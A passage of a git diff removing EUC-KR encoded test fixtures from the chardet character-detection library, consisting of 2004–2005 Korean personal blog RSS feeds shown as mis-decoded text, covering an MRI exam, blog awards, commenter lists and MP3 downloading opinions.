    ¸ס µ¸¦ ¸¸ֱ®÷¸¸י °¡ְו ֵו ֶ¢¾מ³×¿ֽ ְײ´ֲ »ְ°¡ ַֿ³× ְײ´. ¹·־ ±׳³א¼®ְּ ְֿ°צ¹רֲ° ¸ס»ְ´. ±׳ »ְ ¿ְ¸¥ֲ ¾ֶ·¡¿¡ ְײ´ֲ ½ֵ°זְּ ½ַֹֿ°װ ´­·ָ´°ם ַׁ´.

    - -

    ´­¸®´ֲ ֱ₪µµ¿¡ µ¶ף ְֶָּ ְ‎ְּ°ֵ³×, ¾ֱֶַ°ֵ³×, ְָּ ÷ֱצ°ֵ³×, ¿עֱקְּ±ג ָµי¾מֱר´°ם ַׁ´. ַצְח ³×ְַ »ףֲֵ´ֲ ¾ֲֶַ »ףְֲֵּ´. ¾ֱֶק ְָּ ÷ֱצ°ֵ³× ¿עֱקְּ±ג ָµיֱצ´ֲ ¾´.

    - -


    -¿ְִָ 5½ֳ45÷׀. MRI ֳװ¿µ. 5½¸מ¸¸¿רְּ¶ף´ֲµ¥, ÷¸ַטֳ³¸®µַ°ֵ°¡ ְּ·±°ֵ¾? ¾ָµַ´ֲ°ֵ¾?

    - -

    ְו÷ס¿¡ ְּ»ףְּ ְײ´¸י¼­ 45÷׀ְ» ±ג´¸®°װ ַ´. ±׳ ½ֳ°£µ¿¾ָ ֱ¶ִ« ½ְֲ±ְּ°¡ ֱֱ¾ֶַֿ´ֲ TV ֱַ·־¸¸ ¸ַֿ´ֿ ÷¸°ם ְײ¾ת´.

    - -

    ½ֳ°£ְּ µְַ ¸צ¿¡ ְײ´ֲ ֳ¶·־ ¸¸µח °ֽµיְ» ¸נµ־ ֱ¦°ֵַֿ°ם ´©¿צ¼­ ְּ»ףַֿ°װ »‎±ה µױ±ֵכ¿¡ ³×¸¦ ¹׀¾מ³ײ¾ת´. ¾א 20÷׀µ¿¾ָ ¿עֱקְֱּצ ¸»¶ץ´. ¸׃¸®±מֱצ ֱ·־ ¹­¾מ °םֱ₪ַ״ֱ״´.

    - -

    ¾א°£ ½ׂ½ַׁׂ ±ג¿מ¿¡ ±גִ§ ¸מ¹ר ַ´ץ´ֿ, ֳ·÷־ֵֽ ´½ֳ ֲן´ֲ´´. ÷ס½ׁ ±ג°ט ¶ַ µ¹¸®°װ ַֿ³ִ´ֲ µםַׁ ֲ¥ֱץ¼¯ְ־ ¸ס¼ׂ¸®·־. ±׳¸®°ן ±גִ§µµ ֲ¾ֶ°¡¸ח 20÷׀ְ» ¹צֵב´. -_-;;;;

    - -

    »צ´¸¥ °זַטְ» ¸¹ְּ ַׁ ַֿ·ח´.

    - -

    ¾ֱֱֶַצ¸»ְ. ³»°¡ ַֿ°ם½ְֽ÷°ֵ ¿ְ·¡¿ְ·¡ ַֿ°ם »ל·ֱ¸י ¾ֱֱֶַצ ¸»ְ.
    -µ·¸נְ¸·ֱ¸י ¾ֱֱֶַצ ¸»ְ.
    -¾ײְ־ֵַׁ׳ »ח¶¹ְ¸·ֱ¸י ¾ֱֱֶַצ ¸»ְ.

    - -

    ¿ְ´ְֳַ ±³ֶָ. ¾ֱֱֶַצ ¸»ְ.

    ]]>
    -238@http://jely.pe.kr/ -monologue -2004-10-21T22:49:42+09:00 -
    - -Google AdSense·־ ְ־ַׁ ֱ¢¼׃÷ׂ°¡ -http://jely.pe.kr/archives/2004/10/20041021_000237.html -javascript·־ ¸נµ־ ·־µשְּ µָ ִָ ֶהְֱּצ°¡ ¿­¸®±ג ¶§¹®¿¡ google adsense¿¡ ֱ¢¼׃ְּ ְ µֱַצ ¾ְ¸¸י ֶהְֱּצ°¡ ¾ֶ¿¹ ¿­¸®ֱצ ¾´ֲ ַצ»ף ¹°. OTL

    - -

    ¾מֲקַַ µ·¹ת·ֱ°ם ÷ְ־°ֵ ¾ֶ´ֿ¾תְ¸´ֿ, ְּ¸¸ Goodbye~

    ]]>
    -237@http://jely.pe.kr/ -around_Blog -2004-10-21T22:34:56+09:00 -
    - -¹ּ±¹ ´כֵכ·ֹ. ´©°¡µֹ±מ? -http://jely.pe.kr/archives/2004/10/20041021_000236.html -
    collegehumor.com
    yeh~~!!
    ¢ׁ Election Erection '04 (via OttyHotties) - ¾ױ¿¡ 19± µֱצ°¡ ÷¸ְּ½ֱֳׂ? 19¼¼ ¹ּ¸¸ְ÷ ֵ¬¸¯ֱַֿצ ¸¶¼¼¿ה - -

    ¼±°ֵ¿¡¼­ ´©±¸¸¦ »ְּ»ֱצ ְ½ְֵַ °¡½¿ - °¡½¿ְּ ¾ֶ´ׁ ´¸¥ °ק¿¡ ¾´ »ח¶קµµ ְײ±ה ֱַֿצ¸¸ - ¿¡ ±ְ» ½ב¼­ ֵץַ¥ַֿ´ֲ »חְֶּ®´. ¹ת½ב ִ³¸® 179¸ם ÷־½¬ 91¸םְּ³× ´©µו»חֱרְ» ÷¸³ֲ´.

    - -

    ¿ל¸®³×¶ף¿¡µµ ְת·¸°װ ¹ר¶אְּ´ֲ ¾ְֶּµנ¾מ·־ ¹«ְוַׁ °ְַַׁ(?) ¼÷ְ־ְ¿כ ¼­÷ס½÷°¡ µמְוַ״¾ַׁ´. ¹°·׀ ¼÷ְ־ְ¿כ ÷ם·־±׳´ֲ ְײֱצ¸¸¼­µµ...

    ]]>
    -236@http://jely.pe.kr/ -around_Web -2004-10-21T01:20:12+09:00 -
    - -ֳװ¿µ -http://jely.pe.kr/archives/2004/10/20041020_000235.html -³»ְֿ ֳװ¿µְּ ְײ´. ְּ»°װ ³×¿ֽ¾ ֵַׂµ¥...
    -

    ]]>
    MRI ֳװ¿µ
    -
    ְ±ג°ר¸ם¿µ»ף¹‎ [ם¸ׁ¨ֽל°ח±ְצ, magnetic resonance imaging/MRI]

    - -

    ְ·ֲ¿¡ ְַַֿ¿© ¹»‎ַֿ´ֲ ְ±גְוְ» ְּ¿כַֿ¿© »‎ֳ¼ְַ ְ׃ְְַַ ´ֳ‏»ףְ» ¾עְ» ¼צ ְײ´ֲ ֳ·´ְַַ׀±ג°ט, ¶ַ´ֲ ±׳ ±ג°ט·־ ¸¸µח ¿µ»ף¹‎. more

    - -


    -±ְµµ °ֻ»ח
    -

    ±ְµµ [׀ֹן³׃ס, electromyogram]

    - -

    ±ְ°ְַ ָ°µ¿ְְ§(ְװׁן³ךָ)¸¦ ±ג·ַֿׁ °מ¼±.
    -½ַ¿כְְ¸·־´ֲ ְ־ֳ¼ְַ ַַ÷־ ַ¥¸י¿¡ ְ±״ְ» ÷־ֲרַֿ¿© ְְ§¸¦ ְ־µµַֿ´ֲ ַ¥¸יµµֳג¹‎°ת, ִ§»ףְ±״(צׂן³׀¿)ְ» ±ְ°¿¡ ²ָ¾ֶ ³ײ°ם ±ְ° ³»ְַ ַׁ ֱצֱ¡¿¡ »‎±ה ָ°µ¿ְְ§¸¦ ְּ²ר¾מ³»¾מ ¿מµ¿´ְ§ְַ ָ°µ¿ְ» °ֳֻגַֿ´ֲ ¹´ְֳ±״¹‎ְּ ְײ´. ¹´ְֳ±״¹‎¿¡ ְַַֿ¸י ±ְ°ְַ ָ°µ¿ְְ§°¡ ¸ֵָ¸ ÷׀¸®µַ¾מ ±ג·ֿµַ°ם, ±׳°ְּֽ ¸ֳֵ ¸מ ָ¸¿¡¼­ 20~30ָ¸±מֱצ ±ְ°ָ°µ¿ְַ ֱ₪µµ¿¡ µ¶ף ÷ףµµ¸¦ ´¸®ַֿ´ֲ °ְּֽ ¹אַפֱ³´. ±ְµµ¿¡ ְַַ״¼­ ¿מµ¿±ג´ְַֹ ְּ»ףְַ ¿רְ־ְ» ֱרֲַׂ ¼צ ְײ´ֲ °ז¿לµµ ְײ´. ¹´ְֳ±״ְ¸·־´ֲ ֱײ»ח¹´ְֳַ ֱ½ֹ¿¡ °¡´ְ´¶ץ ִ§»ףְ±״ְ» ְ‎¿¬ °םֱ₪ַֿ°ם, ֱײ»ח¹´ְֳ» ´¸¥ ±״ְ¸·־ »ח¿כַֿ´ֲ °ְּֽ ÷¸ֵכְ־µ¥, ְּ°ְֽ» µ¿½ְֹ±״(װׂד‎ן³׀¿)ְּ¶ף ַׁ´. more

    - -

    ³»ְֿ ¿ְִָ 3½ֳ¿¡´ֲ ±ְµµ °ֻ»ח¸¦ ¹°ם, ¿ְִָ 5½ֳ 30÷׀¿¡´ֲ MRI ֳװ¿µְ» ַׁ´.
    -°ֻ»ח¸¦ ֵכַ״¼­ ְּ¹ר¿¡´ֲ ָ®½ַָק ִ¡·בַ״¼­ ´½ֳ´ֲ ¸ס »»»»ַֿ°װ µי°ם ´´ֱֿצ ¸»¾ֶ¾ ֵַׂµ¥. ³¹« °םֵכ½÷·´°ֵµח. -_-;;

    ]]>
    -235@http://jely.pe.kr/ -monologue -2004-10-20T14:16:31+09:00 -
    - -ְֽ¼קַװְּ¶ץ... -http://jely.pe.kr/archives/2004/10/20041019_000234.html -¸סְּ ¾ֱֶַ±ג ½ְֱֳַׁצ ¹ת½ב 1³גְּ ³ׁ¾מ ¹צ·ָ´. (¸ס±¸¸ְּ ¾ֶ´ֿ¶ף ¸ס»ְְװ´ֿ´. h~~´װ) ֳ³ְ½ ½ַֹֿ°װ ¾ִֶֶ¼­ 2´ ֱ₪µµ ÷´¿ר¿¡ ´³ז¾ת°ם, ±׳ ְִָּ¿¡´ֲ ±׳³ֹ °µפ¸¸ֵ­ ¾ִֶֶ¼­ ´כ°­ »ל°ם ְײ¾ת´.
    -±׳·±µ¥ ֳײ± ֳ³ְ½ ¾ְֶֶֽ» ¶§¸¸ֵ­ ¸¹ְּ ¾ִֶֶ¿ְ±ג ½ְֳַ´. ¹ת½ב 1ֱײְְּֿ ³ׁ¾ת´. ְֱּ¦ ¸ס ¾ֲֶַ °ְּֽ ְֽ¼קַ״ֱצ·ֱ°ם ַׁ´.

    - -

    ְֽ¼קַ״ְֱּ¶ץ ְּ·± °ְּֽ¾ת³×? ¾ֱֶַ¸י¼­µµ ´ץְּ»ף ¾ֱֶַ´°ם ´ְ³¢ֱצ ¸רַֿ´ֲ°ֽ.
    -ְְּֿ ְֽ¼קַ״ֱצ°ם, »ח¶קְ» ¸¸³×´ֲ°װ ְֽ¼קַ״ֱצ°ם, ֱײ÷¯¿¡ ְֽ¼קַ״ֱצ°ם... ְֽ¼קַ״ְֱ÷ ְ¶ף´ֲ °ְּֽ¶ף »‎°¢ַ´ֲµ¥. ¹°·׀ ¸ס ¾ֲֶַ °ֽ°ת´ֲ ¶ַ ´¸¥ ¹®ֱ¦ְֱּצ¸¸, ְֽ¼קַ״ְֱּ¶ץ ±אֱ₪ְְ־ °ֽ¸¸ְ÷ ¾ֶ´ֿ¶ף´ֲ °ְֽ» »ץ»ן ±ת´´ֲ´.

    - -

    ְֽ¼קַ״ְֱ» µ־·ֱ¿צַֿ´ֲ ¹°¹ז¿ןְַ ¸¶ְ½ְ» ¾ֱֶײ ֱ¶± ְַּ״ַׂ ¼צ ְײְ» °ֽ °°´.

    - -

    - -

    »ל¾ֶ°¡¸י¼­ »‎°¢ַ״¾ ַׂ °ְֽ÷ ³¹«³×µµ ¸¹´.
    -±׳µ¿¾ָ ³×´ֲ ְֽ¼קַ״ ֱצ´ֲ °ְּֽ¶ף´ֲ ְְ§¿ֽ ¾ְַָּװ, ±׳¸®°ם ְ§¼±ְ» ¾ױ¼¼¿צ ³׀°װ ÷¸ֱצ ¸רַֿ°ם ְײ´ר °ְֽ÷ ¾ֶ´ׂ±מ?

    - -

    p.s. ¹דְַ °¨¼÷ְ¸·־ ´ְ²¼´ר »‎°¢ְ» ¾ִֶ§¿¡ ´½ֳ ֱ₪¸®ַֿ´ֲ °ְֽ÷ ¾מ¸®¼®ְ÷ ֱ‏ְ־ °ֽ °°´. ¾ִֶ§¿¡´ֲ ְַפ ±׳ °¨¼÷ְ» ´ְ³¥ ¼צ°¡ ¾ר´.

    ]]>
    -234@http://jely.pe.kr/ -monologue -2004-10-19T08:53:44+09:00 -
    - - -
    -
    \ No newline at end of file diff --git a/chardet/tests/EUC-KR/jowchung.oolim.net.xml b/chardet/tests/EUC-KR/jowchung.oolim.net.xml deleted file mode 100644 index 932209f..0000000 --- a/chardet/tests/EUC-KR/jowchung.oolim.net.xml +++ /dev/null @@ -1,306 +0,0 @@ - - - - -Blog of JWC -http://jowchung.oolim.net/index.php -In his heart a man plans his course, but the LORD determine his step. - Proverbs 16:9 -ko -Wed, 28 Dec 2005 16:26:14 +0900 - -10¸¸ ָקֶ® ְֳא + ¿©·¯°¡ֱצ -http://jowchung.oolim.net/index.php?pl=83 -
    ±׳µ¿¾ָ ְ־ֵֽ³ »חֱ₪°ת ¿©·¯ ֱ‎¾ָ »חֱ₪ְ¸·־ ְ־ַֿ¿© °¸®³× ֶק½÷ֶ®¸¦ ֱ¦´כ·־ ֱַֿצ ¸רַ½ְ´ֿ´. ¿ְ´ֳ ¿ְ·£¸¸¿¡ °¸®ְ ֶהְֱּצ¿¡ ·־±׳ְ־ַ״¼­ ֵכ°ט¸¦ ָ®ְ־ַֿ´ֿ 10¸¸ְּ ³ׁ¾מ°¡¹צ¸° ִ«¿מֵֽ¸¦ ÷¸°ם ְֳאַֿ´ֲ ְַ¹ּ¿¡¼­ ¿ְ·£¸¸¿¡ ֶק½÷ֶ®¸¦ ַ״ ÷¾´ֿ´.
    -
    -
    ¶ַ ¿ֲ¿¡ ÷¸½ֳ´ֲ°ֽ°ת °°ְּ ½÷ֶט ֶ®·¢¹יµµ ¸¹ְּ ÷¾ת´ץ±÷¿ה.
    -ַׁ°³ ֱ₪µµ ְײְ¸¸י ±׳³ֹ '±ג³ה'ְ¸·־ ³ְµ־°´ֲµ¥ ³¹« ¸¹ְּ ÷¸³»ֱײ¼ֵ¼­ '¸ש¶¥' ´ »טֱ¦¸¦ ַֿ°½ְ´ֿ´.
    -
    -ְֱּ¦ 2005³גµµ ¸מְֿ ³²ֱצ ¾¾ׂ³׳¿ה. ±׳µ¿¾ָ ¹ז¹®ַ״ ֱײ½ֳ°ם ְַ°±מֱצ ´¾ֱֶײ½ֵ°ֵ °¨»חַױ´ֿ´.[ְְְּֿֿ ´ה÷¯ְ÷ ֱַֿצ ¾¾ֱׂצ¸¸, ¸ֵ¹ר °¨»חָק ְ ְ׀°ם ְײ½ְ´ֿ´.] 2006³ג ¿¡´ֲ ְֱײ ֶק½÷ֶ® ַֿ°ם ¾ֲֻש ֶק½÷ֶ®¸¦ ´ץ ¸¹ְּ ¿ֳ¸®µµ·ֿ ַֿ°½ְ´ֿ´. :)
    -
    -
    ֱצ±±מֱצ ְַ° ´¾ֱֶײ½ֵ °ם¸¶¿מ ÷׀µי:
    isisַׁ ְ¯ַ׀»‎DreamBoyminheartjiwon
    ֱַ·־ֳ₪ֵֽ111cuspymdֳ»»חֳ·ױikchang
    cmkim·־·־±ט¿כ¹seakybstcjun
    mailhoapplevirus¿µְ־Sangmin¹÷¸
    iooioo½ֵָ¸ְו¿©¸§ַֿ´ֳfreezn¹יֲֵ¿µ
    cheoleDebris±טֳ¢ָ¯ְּ±װ¾ֵֶ©¸ףµו
    ¸גַַ½÷¾ָ±¹ַצ·£´‎ְַ¿©½ֵtrimir³²±÷
    ַד±÷Exthrill¹ּµ¿´©±¸°װְּµ¿ַו
    DeHolָײ¿¬¿ל¸®ֶׂ°ֵ÷ֿ°ֵ÷ֿBlueZin¡
    kjMVP°¡¸נ³ִJay±טֲֵַ¿µֳֵ
    ¼צ´ֿ±טµ¿±װAntiM$±ט¹®±װ±ט¼¼ֱײ
    ֳײְח¿µ¼­÷´¿םֱִַchang³כ»ץ
    claztec°±÷¾ְֶ÷ם·־±׳ ³×¶ףZF
    Ng-_-Kaorwְװ¸םְּlunamothodoroso
    ¹«ְְ¼³ְּ¼÷ֳֶָµֱ₪¿ם÷־ֵ¹ַ״¿הֲק´ֿ
    artfrige±טµ־ֱ¾¾ֶ°ם¶ףֳ´כֱ»jangkc
    ¸»ְ¿ְ¶ף¹צ´ֿJinbarkmksimcga±ֲ¸ַ
    ¾ֶ¸§¼צַ®ְֳ‎ֱ₪ַֿ¼צ¼­÷´¿ם¾ֶ°ם¶ףְוָ­½ְֵ÷°ם¾חְּ
    ½ֵ±₪ָ£PrissFFDSFZZzest
    ½ַ½ֳ°£tvDeHol¸ֶ햏ֶָ±÷ְּ¸¸¿ץ
    sun4everSHIBATAyellclaztecFineApple
    ָ¿¹ּ´ֿJun'sְו¸ס¼צintherye¾ֻ´¸®
    DHL1111BILLsteveJen
    Talez¹µ¿ֲשjoon½ֵ±ג¼צֱ₪¿כ
    ¿ְ¿µ°ַַֿ´ְֳּ¸¼ְ÷³¯¹ֱײָ¯returnet¸ֱ±÷
    ַ®¹±טֶָ¹־SHIBATA¹«ְְ¼³µ¶°ם³¶ֳµ
    ְּ½ֲֳֵA.B.±מ¸·´«rericgolimit
    ֱײַצְּ²~±טָ£ֳ¶ֳײֱצַ‎³²±װָ£¹ֱ¾¼·
    ְֱּײַצ±טַ¼®¼±¿µµ־²¨÷סֱ¶¼÷¹־
    ִֶ÷־Ray_±ט¼צַצ¹÷´ֱײjangpro
    ²ְ³׳ְֽ¸םְEterNalֱ₪¿ר±ז±ֽ¿°ְֳּ₪¿¬
    ֲ¯.comְַּצָ£¾ְ־ֳײ¿µ±₪skymin
    mute±טֱר¼®׀ללַׂצָ«ְֱַר
    lemosָו¹ּ¹ֱַּ¹ֲֶ®½ֳ¿רַֿ°װ
    totoEgosy°ץ¸ם¿רְְּװ´ֿ´~!
    ¼¼ְ÷mogoonRaymundo¸µְּ½ֲֳ¶
    yserfirefox½®¹¶קpodcastwolf
    iskim°£µנְֱֱֱֲ÷°ֻ»צMaD rOboT
    »ז¼צMole000makkeng2HKR
    db¹ּ¼ׂ³כ¾ְֶּ¸µִב±¸¸®-_-·ש»ףֱר
    ְְּחµ¿ָ£ָ£ֱ¦½÷¶לְֿ¸נ¸®ֱ¦´׀½÷
    richkiseong±טֶע»ך¾ֻ´¸®ְ÷ֱ₪
    ִִ¨אingַװ¿µֳ¶¾ֵֶ©¸ףµו½צ±÷KM
    jmekkְ÷¾ֿ±×ְְּוֲֵָ£ְ׃³כֱ₪ְ׃¼ק¿¬
    ְ׃½ֱֲ״°ס÷ףַ״ִ¿FlyToKSMָקֱצ¸®¹·־
    heֱצ³×°¡´¸׃ֵ׀÷ׂ¿©¿ל°ֹklutzy
    Gleam±טֱֱֲֵ¦´ֿ÷־¸®¹«¸×µ¿¿ר
    mopmop78funny4uְָ¯ֱר°ֵ´ֿ
    ְ¯¸¶EterNalwithwings°רְ¯kdpark
    °ם¾חְֱּ»חַׁ¼÷ֲֵ¾צָסֳ¶±ט¼÷¿ם±ט¹־¾ֶ
    ´ֱµ¹ְַּׁ¹ר¸¸ֱ₪¹ּ¾ָ£¸נ¸נ¢¾
    ַַַֿֿֿ¾ֻ´¸®¿כtuxinter
    ¹¶ף±ג±׳¶ףµוrexֱ₪¿כ¼³ֳ¼¸®ַג±ג
    EnJI¸¶ֱ¶¸®ִ«´ץֶהְּsonastraea
    ³×´ֿ¹¹־¿לwh144lovejindogy
    °­¹־¼®cykjun.bseunghoyk
    seonjin¸¶ְ½ְ¸·־ ֲן´ֲ »חֱרBJJi Eunkura
    ֱ¦¸£±טֱ₪ַצ¸נ¸נֳק¹ֵ°bi
    loveµ¨¹צµµ¾ֲֶ¯±¸¾ֶ÷ְַּֿ
    justI¹ַצ¸םGood¶ף´ְֿױָ‏
    ַֿ¼צֳ³¸®¿¡µוְ‏ְ÷°ְֵו÷ם·ח¸³ֶףְ־ָסµ¿ְּ
    mylook¿ר¾¾·י¿₪µ־²®eouia
    WHAN_GUNnirvanadawnseaH.Moonmaddie
    ָוָוDraco¸סOrOlko141015
    ¾ֵֶ©¸ףµוJungti1234¼רְֿ¶¥amethystEgo
    ¿ֽ´ֿrEdְ־ֵ¬·חµו(par)Terre¾ְֶּv
    ¼ײ¸®µו¹לֱַַמseyooloopslee±ט¿כָ£
    ַֿ´ְֳּapplevirus¸ײ´ץ-ַֿ´ְֳּ±ז°¡´רֶףְ־ְְְֱּ״
    ¿¢½ֳ½÷ֶ®tanatowellstyleָו¸²¾ר´ֲ´«¿ְ¸£ֵ°µו
    dohoons½ֵ½ֲ±גֶףְ־ָסµ¿ְּanod
    Gleam¢גerinָ¿¹ּ´ֿCNEnJI

    -
    -
    2005³ג ¸¶¹«¸® ְ ַֿ½ֳ°ם »ץַ״ ÷¹ ¸¹ְּ ¹ְ¸¼¼¿ה!
    ]]>
    -NON-COMPUTER - BLAH-BLAH -JWC -Wed, 28 Dec 2005 16:30:28 +0900 -
    - -[LIVE BLOG] 2005³ג ֳײ°םְַ ÷ם·־±׳ ֳֳµַױ´ֿ´ -http://jowchung.oolim.net/index.php?pl=81 -Tracked back from: 2005³ג ֳײ°םְַ ÷ם·־±׳¸¦ ֳֳµַ״ ֱײ¼¼¿ה!
    -
    -

    -¿ֳַ״ְַ ÷ם·־±׳
    --ִ«ֵ׳°ם¸®¿¡ »ף°¾רְּ ¿ֳַ״ °¡ְו ֱֱ¾ׂ´ר ÷ם·־±׳¿¡°װ ֱײ¾מֱצ´ֲ »ף.
    -
    -* ¿¹ְ־´װ [http://yeinz.pe.kr/blog ]
    -
    -
    -
    -¿ֳַ״ְַ ÷ם·־±׳ֵר (¼³ִ¡ַ/ֶקֵ»)
    --¿ֳַ״¿¡ °¡ְו ֱֱ¾ׂ´ר ÷ם·־±׳ֵרְ» ½ֳ»ףַױ´ֿ´. ¼³ִ¡ְַ÷ ֲֵֵֵֽרֱמ, ¿צµוֱַ·¹½÷, ֱ¶±׳µמµמְ» ֶקַװַֿ¸ח ֶקֵ»ְַ÷ ³׳ְּ¹צ, ¿¥ִֶ½÷, ִֶ¶ץµמְװ´ֿ´. (ְּ±·ח½÷µµ ֶקֵ»¿¡ µי¾מ°©´ֿ´.)
    -
    -* ֵ׳ֵֵֽרֱמ [Tattertools: http://www.tattertools.com ]
    -
    -
    -
    -¿ֳַ״ְַ ÷ם·־±׳ µנְְ־(¼³ִ¡ַ/ֶקֵ»)
    --÷ם·־±׳ְַ '½÷ֵ²'ְ» °¡ְו ְ¸¸µח ÷ם·־°ֵ¿¡°װ ֱײ´ֲ »ףְװ´ֿ´. ¿ְַֿׁ ְְ¯°¡ ְײ´ֲ ¼³ִ¡ַ°ת ַ״´ח ֶקֵ» »חְֶּ®ְַ ַׁ°ט¼׃¿¡¼­ ¸¸µי¾מ¾ ַֿ´ֲ ֶקֵ»ְַ÷ °ב°ת÷־ֵֽ ´¸£?¶§¹®¿¡ ¿×½ֳ µ·־ ½ֳ»ףַױ´ֿ´.
    -
    -* CRIZIN+´װ [http://crizin.net ] TT
    -* ְֿ¸נ¸®´װ [http://ilmol.com/wp ] WP
    -* ַֿ´ְֳּ´װ [http://php.chol.com/~ppk314/tt ] TT
    -* ¾ֵֶ©¸ףµו´װ [http://archmond.mizc.com/tt ] TT
    -
    -
    -
    -¿ֳַ״ְַ IT ÷ם·־±׳
    --ִִַ»ֵֽ, ְ¥, ֵ׳ֵ©³מ·־ֱצµמְַ IT°·ֳµָ ³»¿כְ» ´ד°ם ְײ´ֲ ÷ם·־±׳¸¦ ½ֳ»ףַױ´ֿ´.
    -
    -* lunamoth´װ [http://lunamoth.biz ]
    -* ¾ֵֶ©¸ףµו´װ [http://archmond.mizc.com/tt ]
    -* @hof´װ [http://www.hof.pe.kr/wp ]
    -* loser´װ [http://loser.miniwini.com/tt ]
    -
    -
    -
    -¿ֳַ״ְַ ¿µָ­/µו¶ף¸¶ ÷ם·־±׳
    --¿µָ­³× µו¶ף¸¶, ½ֳֶ®ְִ» ´·ח´ֲ ֳײ°םְַ ÷ם·־±׳.
    -
    -* ְּ±װ¿µ´װ [http://leegy.egloos.com ]
    -
    -
    -
    -¿ֳַ״ְַ ְ½¾ַ ÷ם·־±׳
    --ְ½¾ְַ» ´·ח´ֲ ÷ם·־±׳ְװ´ֿ´. ְ½¾ַ ְְִֶֿ» ¿ֳ¸®´ֲ ÷ם·־±׳°¡ ¾ֶ´ֿ¶ף ְ½¾ַ ¸®÷ה³× ֳִ·³, ָ₪ְ÷ ְ½ְֵַ ְְ°מְ» ¿ֳ¸®´ֲ ¹ֱֲצ¼ַ ÷ם·־±׳°¡ ¿©±ג ַ״´חµֻ´ֿ´.
    -
    -* ¿ֽ´ֿ´װ [http://chaekit.com/wany ]
    -
    -
    -
    -¿ֳַ״ְַ »חֱר ÷ם·־±׳
    --°¡ְו ¸ֱר »חֱרµי·־ ²¸חֱר ֶקֵה ÷ם·־±׳¸¦ ½ֳ»ףַױ´ֿ´.
    -
    -* ֶףְ־ָשµ¿ְּ [http://painnick.mireene.com ] (ֶקֵה¸נְְֵּ©)
    -
    -
    -
    -¿ֳַ״ְַ ¿¡¼¼ְּ ÷ם·־±׳
    --ְו¸£¿¡ »ף°¾רְּ ְֱֱ÷ ±ְ» ¾²´ֲ ÷ם·־±׳.
    -
    -* ¿¹ְ־´װ [http://yeinz.pe.kr/blog ]
    -* ¸נ¸נ¢¾´װ [http://momozip.entica.com ]
    -
    -
    -
    -¿ֳַ״ְַ ְת³־¸®ֱע (»חָ¸/ֱ₪ִ¡) ÷ם·־±׳
    --ֱ₪ִ¡, °זֱ¦µמ »חָ¸¿¡ °·ֳµָ ³»¿כְ» ´·ח´ֲ ְת³־¸®ֱע ÷ם·־±׳.
    -
    -* oojoo´װ [http://oojoo.egloos.com ]
    -
    -
    -
    -
    -¿ֳַ״ְַ ±׳¸² ÷ם·־±׳
    --ְ½ְֵּ ±׳¸° ±׳¸², ±׳·¡ַָ ְּ¹ֱּצµמְ¸·־ ¿מ¿µµַ´ֲ ÷ם·־±׳.
    -
    -* applevirus´װ [http://kidd721.cafe24.com/tt ]
    -
    -
    -
    -
    -¿ֳַ״ְַ ֶקµוִ³½÷ֶ® ÷ם·־±׳
    --°¡ְו ¸¶ְ½¿¡ µו´ֲ ֶקµוִ³½÷ְֳֶ» ֱרַאַֿ´ֲ ÷ם·־±׳.
    -
    -* ֶקµוִֹ½÷ֶ®´װ [http://podcast.co.kr ]
    -
    -
    -
    -¿ֳַ״ְַ ¼°ֱר ֱרֱײ ÷ם·־°ֵ
    --»ח¶קµי¿¡°װ ¸¹ְּ ¾ֻ·ֱֱצֱצ ¾¾ֱׂצ¸¸ ¼ׂ°³ַֿ°ם½ְֽ÷ ¼°ֱר ÷ם·־°ֵ¸¦ ֳֳµַ״ֱײ¼¼¿ה.
    -
    -* ְֳּ¢¿¬´װ [http://blog.empas.com/lisyoen ]
    -
    -
    -
    -

    -
    ]]>
    -NON-COMPUTER - BLAH-BLAH -JWC -Mon, 14 Nov 2005 01:10:09 +0900 -
    - -±³ְֶָּ µֹ ¸¸ַׁ ¸ם¾נ ¸נְ½ -http://jowchung.oolim.net/index.php?pl=80 -

    -
    ³»¿כְּ ³¹« ֱֱ±ג¿¡ ¸¹ְ÷ ÷׀µיְּ ÷ְֳ¸¸י ַֿ´ֲ ¸¶ְ½¿¡¼­ ֶק½÷ֶ® ַױ´ֿ´.
    -
    -¿ְ´ֳµµ ַא÷¹ַׁ ַֿ·ח µַ¼¼¿ה~
    -
    -ֳגֳ³´ֲ ac3korea]]>
    -NON-COMPUTER - QUOTES -JWC -Sun, 13 Nov 2005 11:40:43 +0900 -
    - -ְַּ״ַׂ ¼צ ¾ר´ֲ ÷ׂ¹‎ MP3 °רְ¯ ַױ¸®ָ­ ֱײְו -http://jowchung.oolim.net/index.php?pl=79 - -
    -1. "ְ½¹ ֶָ°ם ½ְֽ¸¸י ְ½¾ְַַ ֱתְ» ³פְּ´ר°¡. ¿ײ ֱֻ¾ר´ֲ MP3¿¡ µ¹ְ» ´רֱצ³ִ. x°°ְ÷ ³כ·¡ ¸¸µי¾מ ³ץ°ם ¿ײ µ‎ֱצ³ִ"
    -¾מֲמ÷¸¸י ¸ֲ´ֲ ¸»ְֿ¼צµµ ְײֱצ¸¸, ֱ¦°¡ ³³µזְּ ¾ָµַ´ֲ°ְֽ÷, ¿ײ ֱת ³·ְ÷ ³כ·¡¸¦ µט°ם °רְ¯ַֿ³ִ´ֲ °ּ´ֿ´. ¶ַ, ֱת ְֱֱ÷ ³כ·¡´ֲ ְ½¹ »ח¼­ µט´ֲ´´ֲ ¼ׂ¸®ְ־µ¥, ±׳·³ ±»ְּ MP3 ´¼׃¿¡ µ‎ֱצ°ֹ ְְּ¯°¡ ¾רֱצ ¾³×¿ה? ¾מֲקַַ ְ±ג¿ֽ´ֲ »ף°¾ר´ֲ ¾ך±גµי ְֵֿ׳´ֿ±מ¿ה. ±µ¥ ְת·± ְְּ¯·־ ֱײְוְ» ֶל´ֲ°װ ְּ»ףַױ´ֿ´.
    -
    -2. "³­ µ·ְּ ¾ר´ֲµ¥ ¾מ¶»°װ ְּ°ֽ ְת°ֽ ¾מ¶»°װ ´ »ל ¼צ ְײ°´ְ³ִ."
    -ֱ» ³׀ְ÷ ½ֳ°¢¿¡¼­ ÷¸¸י ¸»µµ ¸¹ְ÷°ֹ »‎°¢ַֿ°װ ¸¸µל´ֿ´.
